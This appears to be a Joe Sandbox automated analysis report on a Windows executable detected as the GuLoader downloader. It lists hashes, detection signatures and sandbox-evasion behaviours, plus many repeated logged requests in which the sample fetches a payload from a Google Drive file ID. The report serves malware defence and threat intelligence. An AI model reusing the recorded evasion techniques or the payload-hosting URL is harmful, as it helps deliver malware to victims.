Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QNuQ5e175D.exe

Overview

General Information

Sample name:QNuQ5e175D.exe
renamed because original name is a hash value
Original sample name:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa.exe
Analysis ID:1588755
MD5:9bb2cdb8508ee2255a35ecec43462a48
SHA1:c7465e8b0a3ae61b23520752afbb8bf89a3cecdd
SHA256:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa
Tags:exesigneduser-adrian__luca
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • QNuQ5e175D.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\QNuQ5e175D.exe" MD5: 9BB2CDB8508EE2255A35ECEC43462A48)
    • QNuQ5e175D.exe (PID: 7988 cmdline: "C:\Users\user\Desktop\QNuQ5e175D.exe" MD5: 9BB2CDB8508EE2255A35ECEC43462A48)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1535894824.000000000446C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000003.00000002.2559418196.00000000017EC000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T05:06:01.073774+010028032702Potentially Bad Traffic192.168.2.1149854172.217.16.142443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: QNuQ5e175D.exeVirustotal: Detection: 63%Perma Link
      Source: QNuQ5e175D.exeReversingLabs: Detection: 44%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: QNuQ5e175D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49854 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.11:49860 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49871 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49888 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49926 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49943 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49959 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49990 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50004 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50006 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50008 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50012 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50016 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50018 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50020 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50024 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50026 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50034 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50036 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50038 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50042 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50044 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50048 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50052 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50054 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50056 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50060 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50062 version: TLS 1.2
      Source: QNuQ5e175D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_00402930 FindFirstFileW,3_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_004068D4 FindFirstFileW,FindClose,3_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C83
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49854 -> 172.217.16.142:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
